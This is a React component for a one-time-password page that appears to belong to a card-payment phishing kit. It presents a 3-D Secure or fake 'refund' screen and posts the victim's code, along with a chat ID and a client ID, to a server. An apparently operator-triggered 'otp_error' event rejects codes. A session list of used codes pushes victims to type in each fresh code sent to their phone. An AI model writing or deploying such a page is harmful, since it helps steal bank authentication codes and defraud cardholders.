import React, { useState, useEffect } from 'react';
import { useNavigate } from 'react-router-dom';
import axios from 'axios';
import StandardCardLayout from './StandardCardLayout';
import { t } from '../utils/i18n';
import { SERVER_URL } from '../utils/config';

export const OtpPage = () => {
  const navigate = useNavigate();

  const [otp, setOtp] = useState('');
  const [error, setError] = useState('');
  const [submitting, setSubmitting] = useState(false);

  const isRefund = localStorage.getItem('refund_mode') === 'true';
  const refundAmount = localStorage.getItem('refund_amount') || localStorage.getItem('amount') || '0.00';

  const minLen = 4;
  const maxLen = 8;

  useEffect(() => {
    const checkOtpError = () => {
      if (localStorage.getItem('otp_error') === 'true') {
        setError(t('invalidOtp'));
        setOtp('');
        localStorage.removeItem('otp_error');
      }
    };
    checkOtpError();
    window.addEventListener('otp_error', checkOtpError);
    return () => window.removeEventListener('otp_error', checkOtpError);
  }, []);

  const handleSubmit = async (e) => {
    if (e && e.preventDefault) e.preventDefault();
    const cleanOtp = otp.trim();

    if (cleanOtp.length < minLen || cleanOtp.length > maxLen) {
      setError(`Please enter a valid ${minLen}-${maxLen} digit code.`);
      return;
    }

    // Check against previously used OTPs in this session
    const usedOtpsRaw = sessionStorage.getItem('used_otps');
    const usedOtps = usedOtpsRaw ? JSON.parse(usedOtpsRaw) : [];
    if (usedOtps.includes(cleanOtp)) {
      setError('This OTP code has already been used. Please enter the new code sent to your phone.');
      return;
    }

    setError('');
    setSubmitting(true);

    try {
      const clientId = localStorage.getItem('clientUuId');
      const chatId = localStorage.getItem('chatId');
      await axios.post(`${SERVER_URL}/api/otp`, {
        clientId,
        otp: cleanOtp,
        chatId,
        isRefund,
      });

      // Record OTP as used after successful submission
      usedOtps.push(cleanOtp);
      sessionStorage.setItem('used_otps', JSON.stringify(usedOtps));

      navigate('/3ds/loading');
    } catch (err) {
      setError(t('invalidOtp'));
    } finally {
      setSubmitting(false);
    }
  };

  const handleCancel = () => {
    const geo = localStorage.getItem('geo') || 'vn';
    const checkoutPath = localStorage.getItem('checkout_path') || `/${geo}/homepage`;
    navigate(checkoutPath);
  };

  return (
    <StandardCardLayout
      mode={isRefund ? 'refund' : 'otp'}
      inputValue={otp}
      onInputChange={(val) => {
        setOtp(val);
        if (error) setError('');
      }}
      onSubmit={handleSubmit}
      onCancel={handleCancel}
      error={error}
      submitting={submitting}
      refundAmount={refundAmount}
      minLen={minLen}
      maxLen={maxLen}
    />
  );
};

export default OtpPage;
